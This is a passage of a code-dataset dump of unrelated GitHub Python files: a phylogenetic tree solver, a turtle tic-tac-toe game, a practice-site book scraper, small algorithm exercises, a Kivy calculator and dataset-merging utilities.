If None, the\n default character matrix is used in the CassiopeiaTree.\n\n Returns:\n DataFrame object of the lambda matrix, but similar in structure to\n DistanceSolver's dissimilarity_map.\n \"\"\"\n\n # get dissimilarity map and save it as private instance variable\n self._similarity_map = super().get_dissimilarity_map(\n cassiopeia_tree, layer\n )\n\n # prepare for first (pairwise) lambda matrix\n N = self._similarity_map.shape[0]\n node_names: np.ndarray = self._similarity_map.index.values\n self._lambda_indices = [[i] for i in range(N)]\n\n # generate the lambda matrix\n lambda_matrix_arr = np.zeros([N, N])\n for (j_idx, i_idx) in itertools.combinations(range(N), 2):\n\n svd2_val = self._compute_svd2(\n pair=(i_idx, j_idx), lambda_indices=self._lambda_indices\n )\n\n lambda_matrix_arr[i_idx, j_idx] = lambda_matrix_arr[\n j_idx, i_idx\n ] = svd2_val\n\n np.fill_diagonal(lambda_matrix_arr, np.inf)\n\n # convert array to dataframe\n lambda_matrix_df = pd.DataFrame(\n lambda_matrix_arr, index=node_names, columns=node_names\n )\n\n return lambda_matrix_df\n\n def find_cherry(self, dissimilarity_map: np.ndarray) -> Tuple[int, int]:\n \"\"\"Finds a pair of samples to join into a cherry.\n\n With dissimilarity_map being the lambda matrix, this method finds the\n argmin pair of subsets of the lambda matrix. The lambda matrix\n consists of rows and columns indexed by subsets of leaves and with\n entries a_ij given by the second singular value of RA where A = S U T, S\n and T being the subsets of leaves corresponding to i and j respectively.\n If i = j, a_ij is set to 'np.inf'. The pair of samples to be\n joined into a cherry is given by the pair (i, j) with the smallest entry\n in the lambda matrix.\n\n Args:\n dissimilarity_matrix: Lambda matrix\n\n Returns:\n A tuple of integers representing rows in the\n dissimilarity matrix to join.\n \"\"\"\n\n return np.unravel_index(\n np.argmin(dissimilarity_map, axis=None), dissimilarity_map.shape\n )\n\n def _compute_svd2(\n self, pair: Tuple[int, int], lambda_indices: List[List[int]]\n ) -> float:\n \"\"\"Computes the second largest singular value for an RA matrix.\n \n From Jaffe et al., the RA matrix is the matrix given by taking\n rows indexed by elements of A, and columns indexed by elements of the\n complement of A. Entries are given by R(i, j), the similarity score\n between i and j. Here, our subset A is given by unioning the\n subsets given in 'pair'. The procedure takes O(n^3) time where n is the\n number of leaves. On average it should be more efficient because we are\n not computing the singular value decomposition of a whole nxn matrix, RA\n is smaller than nxn. 
\n\n Args:\n pair: pair of indices i and j where i > j.\n lambda_indices: the list of subsets for\n which 'pair' refers to.\n\n Returns:\n The second largest singular value of the pair's RA matrix.\n \"\"\"\n i_idx, j_idx = pair\n i_sub, j_sub = lambda_indices[i_idx], lambda_indices[j_idx]\n\n # get combined pair of subsets\n a_subset = [*i_sub, *j_sub]\n\n # get complement\n a_comp = lambda_indices.copy()\n a_comp.pop(i_idx)\n a_comp.pop(j_idx)\n a_comp_flat = list(itertools.chain.from_iterable(a_comp))\n\n # reconstruct RA matrix\n RA_matrix = self._similarity_map.values[np.ix_(a_subset, a_comp_flat)]\n\n # get second largest SVD if available, first if not.\n s = scipy.linalg.svd(RA_matrix, compute_uv=False, check_finite=False)\n if len(s) >= 2:\n svd2_val = s[1]\n else:\n svd2_val = 0\n\n return svd2_val\n\n def update_dissimilarity_map(\n self,\n similarity_map: pd.DataFrame,\n cherry: Tuple[str, str],\n new_node: str,\n ) -> pd.DataFrame:\n \"\"\"Updates the lambda matrix using the pair of subsets from find_cherry.\n\n Args:\n similarity_map: lambda matrix to update\n cherry1: One of the children to join.\n cherry2: One of the children to join.\n new_node: New node name to add to the dissimilarity map\n\n Returns:\n An updated lambda matrix.\n \"\"\"\n # get cherry nodes in index of lambda matrix\n i, j = (\n np.where(similarity_map.index == cherry[0])[0][0],\n np.where(similarity_map.index == cherry[1])[0][0],\n )\n\n # modify names\n node_names = similarity_map.index.values\n node_names = np.concatenate((node_names, [new_node]))\n boolmask = np.ones((len(node_names),), bool)\n boolmask[[i, j]] = False\n node_names = node_names[boolmask]\n\n # modify indices\n self._lambda_indices.append(\n [*self._lambda_indices[i], *self._lambda_indices[j]]\n )\n self._lambda_indices.pop(max(i, j))\n self._lambda_indices.pop(min(i, j))\n\n # new lambda indices\n N = len(self._lambda_indices)\n\n if N <= 2:\n return pd.DataFrame(\n np.zeros([N, N]), index=node_names, columns=node_names\n )\n\n # get the old lambda matrix\n lambda_matrix_arr = similarity_map.drop(\n index=[cherry[0], cherry[1]], columns=[cherry[0], cherry[1]]\n ).values\n\n # add new col + row to lambda matrix\n new_row = np.array([0.0] * (N - 1))\n lambda_matrix_arr = np.vstack(\n (lambda_matrix_arr, np.atleast_2d(new_row))\n )\n new_col = np.array([0.0] * N)\n lambda_matrix_arr = np.array(\n np.hstack((lambda_matrix_arr, np.atleast_2d(new_col).T))\n )\n\n # compute new SVDs\n i_idx = N - 1\n for j_idx in range(i_idx):\n svd2_val = self._compute_svd2(\n pair=(i_idx, j_idx), lambda_indices=self._lambda_indices\n )\n\n lambda_matrix_arr[i_idx, j_idx] = lambda_matrix_arr[\n j_idx, i_idx\n ] = svd2_val\n\n np.fill_diagonal(lambda_matrix_arr, np.inf)\n\n # regenerate lambda matrix\n lambda_matrix_df = pd.DataFrame(\n lambda_matrix_arr, index=node_names, columns=node_names\n )\n\n return lambda_matrix_df\n\n def setup_root_finder(self, cassiopeia_tree: CassiopeiaTree) -> None:\n \"\"\"Gives the implicit rooting strategy for the SNJ Solver.\n\n By default, the SpectralNeighborJoining algorithm returns an\n unrooted tree. To root this tree, an implicit root of all zeros is\n added to the character matrix. Then, the dissimilarity map is\n recalculated using the updated character matrix. If the tree already\n has a computed dissimilarity map, only the new similarities are\n calculated. 
See 'setup_root_finder' in NeighborJoiningSolver.\n\n Args:\n cassiopeia_tree: Input CassiopeiaTree to `solve`\n \"\"\"\n character_matrix = cassiopeia_tree.character_matrix.copy()\n rooted_character_matrix = character_matrix.copy()\n\n root = [0] * rooted_character_matrix.shape[1]\n rooted_character_matrix.loc[\"root\"] = root\n cassiopeia_tree.root_sample_name = \"root\"\n cassiopeia_tree.character_matrix = rooted_character_matrix\n\n if self.dissimilarity_function is None:\n raise DistanceSolver.DistanceSolverError(\n \"Please specify a dissimilarity function to add an implicit \"\n \"root, or specify an explicit root\"\n )\n\n dissimilarity_map = cassiopeia_tree.get_dissimilarity_map()\n if dissimilarity_map is None:\n cassiopeia_tree.compute_dissimilarity_map(\n self.dissimilarity_function, self.prior_transformation\n )\n else:\n dissimilarity = {\"root\": 0}\n for leaf in character_matrix.index:\n weights = None\n if cassiopeia_tree.priors:\n weights = solver_utilities.transform_priors(\n cassiopeia_tree.priors, self.prior_transformation\n )\n dissimilarity[leaf] = self.dissimilarity_function(\n rooted_character_matrix.loc[\"root\"].values,\n rooted_character_matrix.loc[leaf].values,\n cassiopeia_tree.missing_state_indicator,\n weights,\n )\n cassiopeia_tree.set_dissimilarity(\"root\", dissimilarity)\n\n cassiopeia_tree.character_matrix = character_matrix\n\n def root_tree(\n self, tree: nx.Graph, root_sample: str, remaining_samples: List[str]\n ) -> nx.DiGraph:\n \"\"\"Assigns a node as the root of the solved tree.\n\n Finds a location on the tree to place a root and converts the general\n graph to a directed graph with respect to that root.\n\n Args:\n tree: Networkx object representing the tree topology\n root_sample: Sample to treat as the root\n remaining_samples: The last two unjoined nodes in the tree\n\n Returns:\n A rooted tree\n \"\"\"\n tree.add_edge(remaining_samples[0], remaining_samples[1])\n\n rooted_tree = nx.DiGraph()\n for e in nx.dfs_edges(tree, source=root_sample):\n rooted_tree.add_edge(e[0], e[1])\n\n return rooted_tree\n","repo_name":"YosefLab/Cassiopeia","sub_path":"cassiopeia/solver/SpectralNeighborJoiningSolver.py","file_name":"SpectralNeighborJoiningSolver.py","file_ext":"py","file_size_in_byte":14019,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"48"} +{"seq_id":"14251906241","text":"import turtle\n\nMARGIN = 50 \nBOARD_WIDTH = 600\nDIMENSION = 3\nCELL_SIZE = BOARD_WIDTH / DIMENSION\nDELTA = CELL_SIZE / 8\ndata = []\nfor _ in range (DIMENSION):\n temp = []\n for _ in range (DIMENSION):\n temp.append(0)\n data.append(temp)\n\n#turtle.onscreenclick\n\ndef checkAnyWin(ln):\n if sum(ln) == DIMENSION:\n return 'x'\n elif sum(ln) == -DIMENSION:\n return'o'\n \n return ''\n\ndef checkWin():\n # check cols\n for i in range(DIMENSION):\n ln = data[i]\n w = checkAnyWin(ln)\n if w != '':\n return w\n\n # check rows\n for i in range(DIMENSION):\n ln = []\n for j in range(DIMENSION):\n ln.append(data[j][i])\n \n w = checkAnyWin(ln)\n if w != '':\n return w\n \n # check main diagnal\n ln = []\n for i in range(DIMENSION):\n for j in range(DIMENSION):\n if i == j:\n ln.append(data[i][j])\n\n w = checkAnyWin(ln)\n if w !='':\n return w\n\n # check auti diagnal\n ln = []\n for i in range(DIMENSION):\n for j in range(DIMENSION):\n if i + j == DIMENSION - 1:\n ln.append(data[i][j])\n \n w = checkAnyWin(ln)\n if w != '':\n return w\n\n for i in range(DIMENSION):\n for j in range(DIMENSION):\n if data[i][j] == 0:\n return ''\n\n 
return '-'\n\n\n\ndef drawLine(x1, y1, x2, y2, color = '#cb997e'):\n t = turtle.Turtle()\n t.hideturtle()\n t.speed(0)\n t.penup()\n t.goto(x1,y1)\n t.pendown()\n t.goto(x2,y2)\n\n\ndef drawXPiece(x, y) :\n t = turtle.Turtle()\n t.hideturtle()\n t.speed(0)\n t.color('#cb997e')\n t.width(DELTA)\n\n t.penup()\n t.goto(x-CELL_SIZE/2 + DELTA, y - CELL_SIZE/2 + DELTA)\n t.pendown()\n t.goto(x+CELL_SIZE/2 - DELTA, y + CELL_SIZE/2 - DELTA)\n\n t.penup()\n t.goto(x+CELL_SIZE/2 - DELTA, y - CELL_SIZE/2 + DELTA)\n t.pendown()\n t.goto(x-CELL_SIZE/2 + DELTA, y + CELL_SIZE/2 - DELTA)\n\ndef drawOPieceV(x,y) :\n t = turtle.Turtle()\n t.hideturtle()\n t.speed(0)\n t.color('#ddbea9')\n t.width(DELTA)\n t.penup()\n t.goto(x,y)\n t.pendown()\n t.dot(CELL_SIZE-DELTA*2)\n t.color('#ffe8d6')\n t.dot(CELL_SIZE-DELTA*4)\n\ndef dropXPiece(col, row):\n x = -BOARD_WIDTH / 2 + col * CELL_SIZE + CELL_SIZE / 2\n y = -BOARD_WIDTH / 2 + row * CELL_SIZE + CELL_SIZE / 2\n drawXPiece(x, y)\n data[col][row] = 1\n\ndef dropOPiece(col, row):\n x = -BOARD_WIDTH / 2 + col * CELL_SIZE + CELL_SIZE / 2\n y = -BOARD_WIDTH / 2 + row * CELL_SIZE + CELL_SIZE / 2\n drawOPieceV(x, y)\n data[col][row] = -1\n\ndef declareWinner(w):\n t = turtle.Turtle()\n t.hideturtle()\n t.penup()\n t.goto(-BOARD_WIDTH / 2, -BOARD_WIDTH / 2 - 50)\n statement = w + ' wins :)' \n if w == 'x' :\n t.color('#cb997e')\n elif w == 'o' :\n t.color('#ddbea9')\n else:\n t.color('#8b8d70')\n statement = 'tie :('\n t.write(statement, font = ('Courier', 50, 'normal', 'bold'))\n\ndef handleClick(x, y):\n # if click is outside the board, ignore it\n if x < -BOARD_WIDTH / 2 or x > BOARD_WIDTH / 2 or y <-BOARD_WIDTH / 2 or y > BOARD_WIDTH / 2:\n return\n global cur_player\n col, row = xy2ColRow(x, y)\n if data[col][row] != 0: # do nothing if there's already a piece at col, row\n return\n\n if cur_player == 'x':\n dropXPiece(col, row)\n cur_player = 'o'\n else:\n dropOPiece(col, row)\n cur_player = 'x'\n \n w = checkWin()\n if w == '':\n return\n declareWinner(w)\n answer = turtle.textinput('Play once more?', 'Does thou desire to play once more? 
(yes/no)')\n if answer == 'y':\n reset()\n else:\n turtle.bye()\n\ndef reset():\n global data\n data = ([0 for i in range(DIMENSION)] for j in range(DIMENSION))\n turtle.clearscreen()\n drawBoard()\n playGame()\n\ndef playGame():\n sn = turtle.Screen()\n sn.onclick(handleClick)\n\ncur_player = 'x'\n\ndef xy2ColRow(x, y):\n startX = -BOARD_WIDTH / 2\n startY = -BOARD_WIDTH / 2\n col = int((x - startX) / CELL_SIZE)\n col = int((x + BOARD_WIDTH / 2) / CELL_SIZE)\n row = int((y + BOARD_WIDTH / 2) / CELL_SIZE)\n return col, row\n\ndef drawBoard():\n turtle.setup(BOARD_WIDTH + MARGIN * 2, BOARD_WIDTH + MARGIN * 2)\n startX = -BOARD_WIDTH / 2\n startY = -BOARD_WIDTH / 2\n\n for i in range(DIMENSION + 1) :\n x1 = startX\n y1 = startY + i * BOARD_WIDTH / DIMENSION\n x2 = startX + BOARD_WIDTH\n y2 = startY + i * BOARD_WIDTH / DIMENSION \n drawLine(x1,y1,x2,y2)\n\n for i in range(DIMENSION + 1):\n x1 = startX + i * BOARD_WIDTH / DIMENSION\n y1 = startY\n x2 = startX + i * BOARD_WIDTH / DIMENSION\n y2 = startY + BOARD_WIDTH\n drawLine(x1,y1,x2,y2)\n\n \n\n\n#main logic\ndrawBoard()\nplayGame()\nturtle.done()\n\n#O O\n# L\n# n","repo_name":"cosmosuo/tacky-toes","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":4867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23762186104","text":"import os\nimport re\nfrom bs4 import BeautifulSoup as bs\nimport requests\nfrom queue import Queue\nimport threading\nimport time\nimport concurrent.futures\n\nexitFlag = 0\nno_threads = 50\nthreadlist=[]\n\nfor t in range(1, no_threads):\n threadlist.append(t)\n\nqueueLock = threading.Lock()\nworkQueue = Queue(100)\nthreads = []\nthreadID = 1\n \n\ndef html_parser(url):\n # parse url to html\n # param: url - website url to scrape\n response = requests.get(url)\n soup = bs(response.content, 'html.parser')\n return soup\n\ndef get_book_info(book_url):\n # book information and download book image\n print('Sraping url : ', book_url)\n html_book_content = html_parser(book_url)\n download_book_image(get_book_url_image(book_url, html_book_content))\n info = product_info(html_book_content)\n book_info = {\n # 1. product page url\n 'product_page_url' : book_url,\n # 2. universal product code (upc)\n 'universal_product_code' : info['UPC'],\n # 3. title\n 'title' : get_book_title(html_book_content),\n # 4. price_including_tax\n 'price_including_tax' : info['Price (incl. tax)'],\n # 5. price_excluding_tax'\n 'price_excluding_tax' : info['Price (excl. tax)'],\n # 6. number_available\n 'number_available' : get_stock_number(info['Availability']),\n # 7. product description\n 'product_description' : get_book_description(html_book_content),\n # 8. category\n 'category' : get_book_category(html_book_content),\n # 9. review_rating - class=\"star-rating One”\n 'review_rating' : get_rating(html_book_content),\n # 10. 
image_url\n 'image_url' : get_book_url_image(book_url, html_book_content)\n }\n\n if book_info:\n return book_info \n return False\n\ndef get_stock_number(content):\n # stock available\n stock = re.sub(r'[()]','', content).split()\n return stock[2]\n\ndef product_info(html_book_content):\n # get product information: UPC, prices, stock availability\n content = html_book_content.findAll('tr')\n info = {}\n for i in content:\n info[i.findChildren()[0].text] = i.findChildren()[1].text\n return info\n\ndef get_rating(html_book_content):\n content = html_book_content.find('p', class_='star-rating')\n stars = content['class'][-1]\n # rating view\n rating = {\n 'One' : 1,\n 'Two' : 2,\n 'Three' : 3,\n 'Four' : 4,\n 'Five' : 5\n }\n if stars in rating:\n return rating[stars]\n\n return False\n\ndef get_book_description(html_book_content):\n # book description\n description = html_book_content.find('p', class_=False, id=False)\n if description:\n return description.string\n else: \n return False \n\n\ndef get_book_title(html_book_content):\n # book title\n title = html_book_content.title.text\n return title.strip()\n\n\ndef get_book_category(html_book_content):\n # book category\n category = html_book_content.find('ul', class_='breadcrumb')\n content = category.findChildren()[4]\n if content:\n return content.text.strip()\n else:\n return False\n\ndef get_book_url_image(book_url, html_book_content):\n # image url\n url_image = html_book_content.find('img', class_=False, id=False)\n if url_image.has_attr('src'):\n filename = re.search(r'/([\\w_-]+[.](jpg|gif|png))$', url_image['src'])\n if filename and 'http' not in url_image['src']:\n # modify image url\n img = url_image['src'][6:]\n url = '{}{}'.format(book_url[:27], img)\n return str(url)\n else:\n # if image extension doesn't exist\n print(\"Error filename: {}\".format(url_image['src']))\n return False\n\n\n# def get_book_url(website_url, main_html):\n# # return book full url\n# content = main_html.find('div', class_='image_container')\n# get_link = content.find('a')['href']\n# if 'http' not in get_link:\n# url = '{}{}'.format(website_url, get_link)\n# return url\n# return False\ndef get_next_page(url):\n # retrieve all url of all pages existing\n tmp = url[:-10]\n category_url = [url] \n while True:\n html = html_parser(category_url[-1])\n next_page = html.find('li', class_='next')\n if next_page:\n link = next_page.find('a')\n working_url = requests.get('{}{}'.format(tmp, link['href']))\n if working_url.status_code == 200: \n category_url.append('{}{}'.format(tmp, link['href']))\n else:\n break \n else:\n break \n\n return category_url\n\n\ndef get_tmp_books_urls(url):\n # return all value foun in href in each books\n html = html_parser(url)\n content = html.findAll('ol', class_='row')\n temp_links = []\n for div in content:\n # product container\n divs = div.findAll('div', class_='image_container')\n for a in divs:\n # get book links\n hlinks = a.findAll('a', href= True)\n for link in hlinks:\n temp_links.append(link['href'])\n\n return temp_links\n\ndef get_all_books_url(category_url):\n \n # https://books.toscrape.com/catalogue\n category_tmp = category_url[:36]\n\n temp_links = []\n # If next page \n next_page_urls = get_next_page(category_url)\n if next_page_urls:\n for url in next_page_urls:\n temp_links.extend(get_tmp_books_urls(url))\n else:\n get_tmp_books_urls(category_url)\n\n # working urls\n links = []\n for link in temp_links:\n # modifies the links since url isn't complete\n if 'http' not in link:\n tmp_url = link[8:]\n book_url 
= '{}{}'.format(category_tmp ,tmp_url)\n links.append(book_url)\n \n return links\n \n\ndef get_category_url(website_url, main_html):\n content = main_html.find('ul', class_='nav-list')\n get_link = content.findAll('a')\n links = []\n for link in get_link:\n if 'http' not in link:\n url = '{}{}'.format(website_url, link['href'])\n links.append(url)\n return links\n\nimport csv\ndef save_csv(book):\n # create csv file with book data\n header = [\n 'product_page_url',\n 'universal_product_code',\n 'title',\n 'price_including_tax',\n 'price_excluding_tax',\n 'number_available',\n 'product_description',\n 'category',\n 'review_rating',\n 'image_url'\n ]\n # save information to csv file\n filename = 'misc/csv/%s.csv' % book['category']\n\n if os.path.isfile(filename):\n with open(filename, 'a', newline='') as output_file:\n writer = csv.DictWriter(output_file, fieldnames=header)\n writer.writerow(book)\n else: \n with open(filename, 'w') as output_file:\n writer = csv.DictWriter(output_file, fieldnames=header)\n writer.writeheader()\n writer.writerow(book) \n\n\ndef download_book_image(book_image_url): \n # download image to misc/images/\n # get image file name\n img = str(book_image_url[45:]) \n with open('misc/images/'+ str(img), 'wb') as f:\n response = requests.get(book_image_url)\n return f.write(response.content)\n\n# ================================ main ================================ #\n\"\"\"\nbook information extraction on each category present\n\"\"\"\n\n\"\"\"\ncreate misc folder with 2 sub folder:\n1. csv folder - which will contain csv files for the scrape data\n2. images folder - which contains images of each book\n\"\"\"\nimport os\nfolders = ['misc', \"misc/csv\", \"misc/images\"]\nfor folder in folders:\n if not os.path.exists(folder):\n os.mkdir(folder)\n \n\n################################### version 1 : 20 min ###################################\n\"\"\"\ntry:\n website_url = 'https://books.toscrape.com/'\n main_html = html_parser(website_url)\n category_url = get_category_url(website_url, main_html)\n for category in category_url[1:]:\n books_link = get_all_books_url(category)\n for book_url in books_link:\n print('data collection : ', book_url)\n data = get_book_info(book_url)\n save_csv(data) \n print('collection of data and download image was successfull') \nexcept:\n print('Unexpected error!') \n\"\"\"\n\n################################### version 2 : 5 min ###################################\n\"\"\"\ncategories =[]\n\ntry:\n website_url = 'https://books.toscrape.com/'\n main_html = html_parser(website_url)\n category_url = get_category_url(website_url, main_html)\n \n for url in category_url[1:]:\n categories.append(url)\n\n print('Collection of data and download image was successfull') \nexcept:\n print('Unexpected error!') \n\nclass myThread (threading.Thread):\n def __init__(self, threadID, name, q):\n threading.Thread.__init__(self)\n self.threadID = threadID\n self.name = name\n self.q = q\n def run(self):\n print(\"Starting \" + self.name)\n process_data(self.name, self.q)\n print(\"Exiting \" + self.name)\n\ndef process_data(q):\n while not exitFlag:\n queueLock.acquire()\n if not workQueue.empty():\n data = q.get()\n queueLock.release()\n books_link = get_all_books_url(data)\n for book_url in books_link:\n print('data collection : ', book_url)\n try:\n data = get_book_info(book_url)\n save_csv(data) \n except:\n print(\"erreur\") \n else:\n queueLock.release()\n time.sleep(1)\n\n\n# Create new threads\ntic = time.perf_counter() # Start Time\nfor tName in 
threadlist:\n    thread = myThread(threadID, tName, workQueue)\n    thread.start()\n    threads.append(thread)\n    threadID += 1\n\n# Fill the queue\nqueueLock.acquire()\nfor word in categories:\n    workQueue.put(word)\nqueueLock.release()\n\n# Wait for queue to empty\nwhile not workQueue.empty():\n    pass\n\n# Notify threads it's time to exit\nexitFlag = 1\n\n# Wait for all threads to complete\nfor t in threads:\n    t.join()\n\ntoc = time.perf_counter() # End Time \nprint(f\"Build finished in {(toc - tic)/60:0.0f} minutes {(toc - tic)%60:0.0f} seconds\") \n\n\"\"\"\n\n################################### version 3 : 3 min ###################################\n\ndef scrape(category_url): \n    books_link = get_all_books_url(category_url)\n    for book_url in books_link:\n        try:\n            data = get_book_info(book_url)\n            save_csv(data) \n        except Exception as e:\n            print(f\"An error has occurred on this url: {book_url}\")\n\ntic = time.perf_counter() # Start Time\ntry:\n    website_url = 'https://books.toscrape.com/'\n    main_html = html_parser(website_url)\n    category_url = get_category_url(website_url, main_html)\n    with concurrent.futures.ThreadPoolExecutor() as executor:\n        executor.map(scrape, category_url[1:])\n    print('Collection of data and download image was successful') \nexcept:\n    print('Unexpected error!') \ntoc = time.perf_counter() # End Time \nprint(f\"Build finished in {(toc - tic)/60:0.0f} minutes {(toc - tic)%60:0.0f} seconds\")","repo_name":"jheslian/scraper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72422097747","text":"import random\n\nclass TreeNode(object):\n    def __init__(self, value='', left=None, right=None):\n        self.value = value\n        self.left = left\n        self.right = right\n        self.size = 1\n\n    def insert_in_order(self, value):\n\n        if value < self.value:\n            if not self.left:\n                self.left = TreeNode(value=value)\n            else:\n                self.left.insert_in_order(value)\n        \n        else:\n            if not self.right:\n                self.right = TreeNode(value=value)\n            \n            else:\n                self.right.insert_in_order(value)\n        \n        self.size += 1\n\n\n    def get_random_node(self, index = None):\n        if not self:\n            return\n        \n        if index is None:\n            index = 
random.randint(1, self.size)\n\n        left_size = self.left.size if self.left else 0\n\n        # index is 1-based within this subtree; this node sits at position left_size + 1\n        if index == left_size + 1:\n            return self\n        \n        elif index <= left_size:\n            return self.left.get_random_node(index=index)\n        \n        elif self.right:\n            return self.right.get_random_node(index=index - (left_size + 1))\n\n\n    def find(self, value):\n        if not self:\n            return \n\n        if value == self.value:\n            return self\n\n        elif value < self.value:\n            return self.left.find(value)\n        \n        else: \n            return self.right.find(value)\n\n    \ndef tests():\n    root = TreeNode(5)\n    root.insert_in_order(3)\n    root.insert_in_order(2)\n    root.insert_in_order(7)\n    root.insert_in_order(6)\n\n    arr = [5, 3, 2, 7, 6]\n    assert root.get_random_node().value in arr\n\nif __name__ == \"__main__\":\n    tests()","repo_name":"hadrizia/coding","sub_path":"code/cracking-the-coding-interview/cap_4_tree_and_graphs.py/4.11.random_node.py","file_name":"4.11.random_node.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"25656836495","text":"import sys\n\nsys.setrecursionlimit(10 ** 7)\nrl = sys.stdin.readline\n\n\nclass BinaryIndexedTree:\n    # 1-indexed\n    def __init__(self, n):\n        self.n = n\n        self.data = [0] * (n + 1)\n    \n    def add(self, i, x):\n        # Accessed by 0-indexed\n        i += 1\n        while i <= self.n:\n            self.data[i] += x\n            i += i & -i\n    \n    def sum(self, i):\n        # [0, i)\n        res = 0\n        while i:\n            res += self.data[i]\n            i -= i & -i\n        return res\n    \n    def bisect_left(self, w):\n        if w <= 0:\n            return 0\n        i = 0\n        k = 1 << (self.n.bit_length() - 1)\n        while 0 < k:\n            if i + k <= self.n and self.data[i + k] < w:\n                w -= self.data[i + k]\n                i += k\n            k >>= 1\n        return i + 1\n\n\ndef solve():\n    N, K = map(int, rl().split())\n    a = tuple(int(rl()) for _ in range(N))\n    \n    b = [0]\n    acc = 0\n    for i in range(N):\n        acc += a[i]\n        b.append(acc - (i + 1) * K)\n    \n    compress = {bi: idx for idx, bi in enumerate(sorted(b))}\n    bit = BinaryIndexedTree(N + 1)\n    \n    ans = 0\n    for bi in b:\n        ans += bit.sum(compress[bi] + 1)\n        bit.add(compress[bi], 1)\n    print(ans)\n\n\nif __name__ == '__main__':\n    solve()\n","repo_name":"yuly3/atcoder","sub_path":"ARC/ARC075/E.py","file_name":"E.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"27531527164","text":"import kivy\r\nkivy.require('1.11.1')\r\nfrom kivy.app import App\r\nfrom kivy.uix.boxlayout import BoxLayout\r\nfrom kivy.uix.textinput import TextInput\r\nfrom kivy.uix.button import Button\r\nfrom kivy import Config\r\nConfig.set('graphics', 'multisamples', '0')\r\n\r\n\r\nclass SimpleCalculatorApp(App):\r\n    def build(self):\r\n        self.operators = [\"/\", \"*\", \"+\", \"-\"]\r\n        self.last_was_operator = None\r\n        self.last_button = None\r\n        main_layout = BoxLayout(orientation=\"vertical\")\r\n        self.solution = TextInput(multiline=False, readonly=True, halign=\"right\", font_size=55)\r\n        main_layout.add_widget(self.solution)\r\n        #create button labels\r\n        buttons = [\r\n            [\"7\", \"8\", \"9\", \"/\"],\r\n            [\"4\", \"5\", \"6\", \"*\"],\r\n            [\"1\", \"2\", \"3\", \"-\"],\r\n            [\".\", \"0\", \"C\", \"+\"]\r\n        ]\r\n        #create buttons with boxlayout for each row\r\n        for row in buttons:\r\n            h_layout = BoxLayout()\r\n            for label in row:\r\n                button = Button(text=label)\r\n                #add on press event function\r\n                button.bind(on_press=self.on_button_press)\r\n                h_layout.add_widget(button)\r\n            #add each row layout to mainlayout\r\n            main_layout.add_widget(h_layout)\r\n        #create equal button\r\n        
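# it is bound to on_solution and added straight to the vertical main_layout, so \"=\" spans the full window width\r\n        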
equals_button = Button(text=\"=\")\r\n equals_button.bind(on_press=self.on_solution)\r\n #add equal_button to main layout\r\n main_layout.add_widget(equals_button)\r\n\r\n return main_layout\r\n\r\n\r\n def on_button_press(self, instance):\r\n current = self.solution.text\r\n button_text = instance.text\r\n\r\n if button_text == \"C\":\r\n self.solution.text=\"\"\r\n else:\r\n if current and (self.last_was_operator and button_text in self.operators):\r\n #if operators are pressed symultaneously, dont do anything\r\n return\r\n elif current ==\"\" and button_text in self.operators:\r\n #if first press is operator, dont do anything\r\n return\r\n else:\r\n new_text = current + button_text\r\n self.solution.text = new_text\r\n\r\n self.last_button = button_text\r\n self.last_was_operator = self.last_button in self.operators\r\n\r\n def on_solution(self,instance):\r\n text = self.solution.text\r\n if text:\r\n solution = str(eval(self.solution.text))\r\n self.solution.text = solution\r\n\r\n\r\nif __name__ == '__main__':\r\n SimpleCalculatorApp().run()\r\n","repo_name":"iduryodhanrao/Pygames","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1134691586","text":"import argparse\nfrom pathlib import Path\nimport os\nimport json\nimport sys\n\nparser = argparse.ArgumentParser(description='Combine averitec files split according to the combine_decorate_files scheme.')\nparser.add_argument('--scheme', default=\"/rds/user/mss84/hpc-work/datasets/averitec/full_data/date.test.with_qs.X.json\", help='')\nargs = parser.parse_args()\n\np = Path(args.scheme)\nfolder = p.parent\nfile_scheme = p.name\nprefix, suffix = file_scheme.split(\"X\")\n\nexamples = {}\n\nfor file in os.listdir(folder):\n if file.startswith(prefix) and file.endswith(suffix) and len(file.split(\".\")) == len(file_scheme.split(\".\")):\n span = [int(x) for x in file[len(prefix):-len(suffix)].split(\"-\")]\n print(\"Reading examples \" + str(span[0]) + \" to \" + str(span[1]) + \".\", file=sys.stderr)\n\n with open(str(folder) + \"/\" +file) as f:\n file_examples = json.load(f)\n for idx, example in enumerate(file_examples):\n if idx+span[0] in examples:\n print(\"Error: Index overlap at index \"+str(idx+span[0]), file=sys.stderr)\n exit()\n examples[idx+span[0]] = example\n\nprint(\"Combining \"+str(len(examples)) + \" examples.\", file=sys.stderr)\nout_examples = [None] * len(examples)\n\nfor idx, example in examples.items():\n out_examples[idx] = example\n\nfor example in out_examples:\n if example is None:\n print(\"Error: Index mismatch\", file=sys.stderr)\n exit()\n\nprint(json.dumps(out_examples, indent=4))","repo_name":"MichSchli/AVeriTeC","sub_path":"retrieval_reranking/combine_decorated_files.py","file_name":"combine_decorated_files.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"48"} +{"seq_id":"27995506354","text":"import numpy as np\nfrom nltk.corpus import stopwords \nfrom nltk.tokenize import word_tokenize \n# from rake_nltk import Rake\nimport json\nimport re\nstop_words = set(stopwords.words('english'))\n\n\nmin_thresh_len = 50\n################## Methods ###################\n# query 1 -> minimal number of stopwords ratio\n# query 2 -> ACT or abberviations match \n# query 3 -> v, vs, versus comes in middle\n# query 4 -> long para, stopwords ratio 
